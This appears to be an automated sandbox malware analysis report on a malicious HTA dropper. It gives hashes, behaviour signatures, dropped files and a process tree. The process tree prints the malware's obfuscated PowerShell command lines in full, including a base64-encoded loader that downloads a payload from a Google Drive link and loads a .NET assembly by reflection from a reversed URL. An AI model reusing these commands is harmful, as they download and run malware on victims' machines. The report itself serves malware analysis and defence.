Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-10-2024 06:01

General

  • Target

    greatwayforbestthignswithwhonotwanttodo.hta

  • Size

    130KB

  • MD5

    67a5ad5e7caf5c79cb209e433c345c0b

  • SHA1

    15776cf58dee4ecb7b42b2836539d8d553bf5439

  • SHA256

    5d06cbde318e42ef7e39a6af52d96576aec4f11477101e4c90718f12c09c5eb4

  • SHA512

    b6b697d11dca698441116526bad13c366ba78b477b7489372fff4155a3a06fc49a6487cf2e7a6e33855b7ac7c57dc0c99760a6fe54e77f2b2ec51539a6f5ee96

  • SSDEEP

    192:Ea2xJKbBKWvKbBRWGWiJnKbBxKbBDWNTKbBUT:UWSHWi0yW22

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with the display window hidden.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatwayforbestthignswithwhonotwanttodo.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe
      "C:\Windows\SySTeM32\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe" "POWerSHELl.EXE -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent ; IeX($(Iex('[sysTEm.TExt.enCODINg]'+[cHaR]58+[chaR]0x3a+'UTF8.GetStRing([sYStEm.cOnvErT]'+[ChaR]0X3A+[chaR]58+'fromBaSe64sTrIng('+[CHar]34+'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'+[cHar]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2980
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnZTZvaW1hZ2VVcmwgPSB6U3JodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB6U3I7ZTZvd2ViQ2xpZW50ID0gTmV3LU9iamVjdCcrJyBTeXN0ZW0uTmV0LldlYkNsaWVudDtlNm9pbWFnZUJ5dGVzID0gZTZvd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShlNm9pbWFnZVVybCk7ZTZvaW1hZ2VUJysnZXh0ID0gW1N5c3RlbS5UJysnZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZTZvaW1hZ2VCeXRlcyk7ZTZvc3RhcnRGbGFnID0gelNyPDxCQVNFNjRfU1RBUlQ+PnpTcjtlNm9lbmRGbGFnID0gelNyPDxCQVNFNjRfRU5EPj56U3I7ZTZvc3RhcnRJbmRleCA9IGU2b2ltYWdlVGV4dC5JbmRleE9mKGU2b3N0YXJ0RmxhZyk7ZTZvJysnZW5kSW5kZXggPSBlNm9pbWFnZVRleHQuSW5kZXhPZihlNm9lbmRGbGFnKTtlNm8nKydzJysndGFydEluZGV4IC1nZSAwIC1hbmQgZTZvZW5kSW5kZXggLWd0IGU2b3N0YXJ0SW5kZXg7ZTZvc3RhcnRJbmRleCArPSBlNm9zdGFydEZsYWcuTGVuZ3RoO2U2b2Jhc2U2NExlbmd0aCA9IGU2b2VuZEluZGV4IC0gZTZvc3RhJysncnRJbmRleDtlNm9iJysnYXNlNjRDb21tYW5kID0gZTZvaScrJ21hZ2VUZXh0LlN1YnN0cmluZygnKydlNm9zdGFydEluZGV4LCBlNm9iYXNlNjRMZW5ndGgnKycpO2U2b2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKGU2b2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYScrJ3koKSAnKydDcHcgRm9yRWFjaCcrJy1PYmplY3QgeyBlNm9fIH0pWy0xLi4tKGU2b2Jhc2U2NENvbW1hbmQnKycuTCcrJ2VuZ3RoKV07ZTZvY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhlNm9iYXNlNjRSZXZlcnNlZCk7ZTZvbG9hZGUnKydkQXNzZW1ibHkgPSBbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2EnKydkKGU2b2NvbW1hbmRCeXRlcyk7ZTZvdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6U3JWQUl6U3InKycpO2U2b3ZhaU1ldGhvZC5JbnZvaycrJ2UoZTZvbnVsbCwgQCh6U3J0eHQuVkdGVkJSUy8yNC8nKycxJysnNDEuNjcnKycxLjMuMjkxLy86cCcrJ3R0aHpTciwgeicrJ1NyZGVzYXRpdmFkb3pTciwgeicrJ1NyZGUnKydzJysnYXRpdmFkb3pTciwgelNyZGVzYXRpdmEnKydkb3pTciwgelNyQ2FzUG9selNyLCB6U3JkZXNhdGl2YWRvelNyLCcrJyB6U3JkZXNhdGl2YWRvelNyLHpTcmRlc2EnKyd0aXZhZG96U3IselNyZGVzYXRpdmFkb3pTcix6U3JkZXNhdGl2JysnYScrJ2RvelNyLHpTcmRlc2F0aXZhZG96U3IselNyZGVzYXQnKydpdmFkb3pTcix6U3IxelNyLHpTcmRlc2F0aXZhZG96U3IpKScrJzsnKS1SZXBsYUNFIChbQ0hhcl0xMjIrW0NIYXJdODMrW0NIYXJdMTE0KSxbQ0hhcl0zOSAtY3JFcExhQ0UnZTZvJyxbQ0hhcl0zNi1SZXBsYUNFIChbQ0hhcl02NytbQ0hhcl0xMTIrW0NIYXJdMTE5KSxbQ0hhcl0xMjQpIHwmICggJHBTaE9tZVsyMV0rJHBzSE9tZVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('e6oimageUrl = zSrhttps://drive.google.com/uc?export=downloa'+'d&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zSr;e6owebClient = New-Object'+' System.Net.WebClient;e6oimageBytes = e6owebClient.'+'DownloadData(e6oimageUrl);e6oimageT'+'ext = [System.T'+'ext.Encoding]::UTF8.GetString(e6oimageBytes);e6ostartFlag = zSr<<BASE64_START>>zSr;e6oendFlag = zSr<<BASE64_END>>zSr;e6ostartIndex = e6oimageText.IndexOf(e6ostartFlag);e6o'+'endIndex = e6oimageText.IndexOf(e6oendFlag);e6o'+'s'+'tartIndex -ge 0 -and e6oendIndex -gt e6ostartIndex;e6ostartIndex += e6ostartFlag.Length;e6obase64Length = e6oendIndex - e6osta'+'rtIndex;e6ob'+'ase64Command = e6oi'+'mageText.Substring('+'e6ostartIndex, e6obase64Length'+');e6obase64Reversed = -join (e6obase64Command.ToCharArra'+'y() '+'Cpw ForEach'+'-Object { e6o_ })[-1..-(e6obase64Command'+'.L'+'ength)];e6ocommandBytes = [System.Convert]::FromBase64String(e6obase64Reversed);e6oloade'+'dAssembly = [Syst'+'em.Reflection.Assembly]::Loa'+'d(e6ocommandBytes);e6ovaiMethod = [dnlib.IO.Home].GetMethod(zSrVAIzSr'+');e6ovaiMethod.Invok'+'e(e6onull, @(zSrtxt.VGFVBRS/24/'+'1'+'41.67'+'1.3.291//:p'+'tthzSr, z'+'SrdesativadozSr, z'+'Srde'+'s'+'ativadozSr, zSrdesativa'+'dozSr, zSrCasPolzSr, zSrdesativadozSr,'+' zSrdesativadozSr,zSrdesa'+'tivadozSr,zSrdesativadozSr,zSrdesativ'+'a'+'dozSr,zSrdesativadozSr,zSrdesat'+'ivadozSr,zSr1zSr,zSrdesativadozSr))'+';')-ReplaCE ([CHar]122+[CHar]83+[CHar]114),[CHar]39 -crEpLaCE'e6o',[CHar]36-ReplaCE ([CHar]67+[CHar]112+[CHar]119),[CHar]124) |& ( $pShOme[21]+$psHOme[34]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1164

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp

    Filesize

    1KB

    MD5

    8a1f03435a459a81166ebbe13d365d3f

    SHA1

    c76c6494d54811a76edce2036dddba96b5404c1f

    SHA256

    acb0a83823a8bc43b746e1c420206b70a8b021b87b05b91171375b2c130ba599

    SHA512

    41f64409878256bca8aa57ecc14959893dcd1e01162997a4f37058329b5b45bb1a3826c4296c5befda4e3cfdcd4f6363df9d511225e40d00b2f2b4ce28ca65f2

  • C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.dll

    Filesize

    3KB

    MD5

    2f638fb1eba866d56f423d31451aceb7

    SHA1

    6f1cc200732d1aced11a3f5284f9d60b16214cd8

    SHA256

    2309e54db417200c0389403337645efee17787cc5d5958aeaac1a929df4afed7

    SHA512

    819a38442c6349da4996da547ea4627d91597dd583c449bfd230f056d1597a9eed890ce1e3106b71e76152d20b0158884813e25b41320b837a3cdb2ba0e93e53

  • C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.pdb

    Filesize

    7KB

    MD5

    730303f36c1c128be833bf6234a3a972

    SHA1

    025a7414d4e5b6d4fe1e38fd24261937749e6c89

    SHA256

    d34421800a99463f44a470b48bd8037945302abfbb79a6252458a3d63c0b2f1c

    SHA512

    08ec3777f9895de8868885cd12c59ab622dead4d49984be2f9cde8f33dceb99dc51600d0fdc93302b22c24477f48d9c87a4d210bf805f341f5d737184aec9d37

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    b8f489dc283ce131d151cc023dff59bc

    SHA1

    e81c63d7ff5f9a738ee43290fe0d513b7d3f5b41

    SHA256

    ae1b74f4367e89e8465eac9b8396e93464dcf2fd61ecd76f0c42a7206d78dbbb

    SHA512

    31adb7d75d55a9fe72b30bb74d0d326f2f5b959dda9a009acd61fcd8534ed380981b9f8c57315983701843cbf113680e939faada4aba5fc30b5c442fcfb9234e

  • C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs

    Filesize

    137KB

    MD5

    5a9b34ae3fd1ec59f9be56049cdbc50a

    SHA1

    9a32f9c0054525e2cb7693df834748f8d2960f97

    SHA256

    dadfc399131b08b48b3b2fbcabbcced43397183a41f9213ca046db03258aa3e3

    SHA512

    d951e1def250c743f06e1c6e83a837c43457ce37101ef93db5416efb52db8e49b2ab4998489b2b51dd135d04e4e661bf529c5f5da3b1915358dbfc1959d9ec93

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp

    Filesize

    652B

    MD5

    ca4592db77543d4f9b3e08d3cfe0c201

    SHA1

    3db05ead44a9f8ef703d53f32ea9daa9ba5d0454

    SHA256

    d81be211b136f1466b37e3077a996919272e5623ca5162ae4d1c71297d69ce90

    SHA512

    f6dc24b309353262b0db0c5ef564df6a3df44f5ef039b696eff26824e31e7b125607278a9dde67bf06f3967ef64113a136e662776299315c401beb0da70a23e1

  • \??\c:\Users\Admin\AppData\Local\Temp\hgq9bbh1.0.cs

    Filesize

    459B

    MD5

    215ff4cb51532af3e78a4f759fc9aa11

    SHA1

    93b2983039e8a5ca1f4fba93f4d239e48ca38b94

    SHA256

    182126a701d9770a97367ac204a3e73a1011c253bc8ec5b83b72fac429595641

    SHA512

    72194a7d39a43d0bc2fbac563b102b28c942cc561e631e35f8324ca54d8d775c529b22eba6655f5fdb65d367e3a864ecc371423e1c2c7e7b62a8b8f7c191fd97

  • \??\c:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline

    Filesize

    309B

    MD5

    bc9fa7f3785f09ee341584ad4c80e23a

    SHA1

    2c890c5ae3138ee02a4c3c4944a8ece79c13b79c

    SHA256

    b37dfbf32a7d694543619b8a006cec5d3785277664833f52da7afd82f2038793

    SHA512

    549ace95b6de70e1ae390e0aec15101bd31edcb09e295e534d19bf899d8eaf8c1564ea8d9b72b280e8c02ee0304af0b65da23c7ad97c4f68d6585638643d46a9